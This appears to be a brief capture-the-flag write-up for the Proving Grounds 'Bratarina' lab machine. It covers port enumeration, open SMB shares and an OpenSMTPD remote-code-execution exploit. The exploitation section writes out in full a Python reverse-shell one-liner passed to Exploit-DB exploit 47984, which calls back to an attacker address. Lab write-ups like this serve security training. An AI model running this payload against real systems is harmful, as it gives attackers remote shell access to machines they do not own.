👨‍💻
Pentesting
HomePlaygroundCTFsBuy Me a Flag 🚩
  • Zeyu's OSCP Writeups
  • Home
  • CTF Writeups
  • Playground
  • Blog Posts
    • My OSCP Journey: How I Tried Harder
  • Proving Grounds
    • Warm Up
      • Pebbles
      • Twiggy
      • Bratarina
      • Internal
      • ClamAV
    • Get to Work
      • Nibbles
      • Nickel
      • WebCal
      • Authby
      • Pelican
      • Jacko
      • Medjed
      • XposedAPI
    • Try Harder
      • Meathead
  • Hack the Box
    • Easy
      • ScriptKiddie
      • Delivery
      • Laboratory
      • Academy
      • Sense
    • Medium
      • Cronos
      • Jeeves
Powered by GitBook
On this page
  • Service Enumeration
  • Samba
  • SMTP
  • Exploitation

Was this helpful?

  1. Proving Grounds
  2. Warm Up

Bratarina

Writeup for Bratarina from Offensive Security Proving Grounds (PG)

PreviousTwiggyNextInternal

Last updated 3 years ago

Was this helpful?

Service Enumeration

nmapAutomator.sh -H 192.168.163.71 -t full

nmapAutomator.sh -H 192.168.163.71 -t vulns

Samba

Null SMB sessions are allowed.

There is a backups share.

SMTP

OpenSMTP 2.0.0 is used.

Exploitation

python3 47984.py 192.168.163.71 25 'python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.49.163\",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")"'

We receive a reverse shell:

Proof:

This is vulnerable to an RCE vulnerability:

https://www.exploit-db.com/exploits/47984